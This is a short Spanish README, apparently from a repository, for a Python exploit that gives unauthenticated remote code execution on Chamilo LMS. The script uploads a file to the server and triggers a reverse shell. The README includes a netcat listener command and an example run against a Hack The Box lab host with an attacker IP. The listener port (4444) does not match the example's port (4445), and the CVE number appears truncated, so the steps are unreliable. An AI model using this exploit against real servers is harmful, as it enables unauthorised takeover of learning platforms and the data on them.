
Ejecución remota de código para Chamilo LMS
pip install requests
El script de Python utiliza la vulnerabilidad CVE-2023-422 para subir un archivo al servidor y usa ese archivo para enviar una reverse shell al listener de netcat, y todo esto se puede hacer sin autenticación. Sin embargo, necesitarás seguir los siguientes pasos para utilizar el script de Python con éxito.
Iniciar el listener de netcat:
nc -lnvp 4444
Ejecutando el script de Python (Ejemplo):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Por favor, deja una estrella si el siguiente exploit te resultó útil :)